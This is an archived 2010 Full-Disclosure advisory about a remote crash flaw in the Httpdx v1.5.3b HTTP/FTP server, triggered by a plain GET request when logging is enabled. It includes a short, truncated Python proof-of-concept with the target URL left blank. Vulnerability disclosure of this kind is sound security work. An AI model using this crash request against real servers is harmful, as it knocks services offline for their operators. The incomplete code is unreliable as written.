lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 19 Mar 2010 15:48:21 +0100
From: Mehdi Mahdjoub - Sysdream IT Security Services <>
Subject: Vulnerability Httpdx v1.5.3b

Program          : Httpdx v1.5.3b
PoC              : Remote Crash Service (if http.log=1)
Homepage         :
Found by         : Jonathan Salwan
This Advisory    : Jonathan Salwan
Contact          :

//----- Application description
Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs with only few threads. Includes directory listing,
virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc.
All settings in one config/script file. 
//----- Description of vulnerability
The vulnerability is caused due to set http.log=1 in httpdx.conf - Error
Writting log
This can be exploited to crash all services http & ftp.
Use simple GET request for crash service.

//----- Credits

import urllib
import urllib2

url = ''

req = urllib2.Request(url)
answer = urllib2.urlopen(req)
page =

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ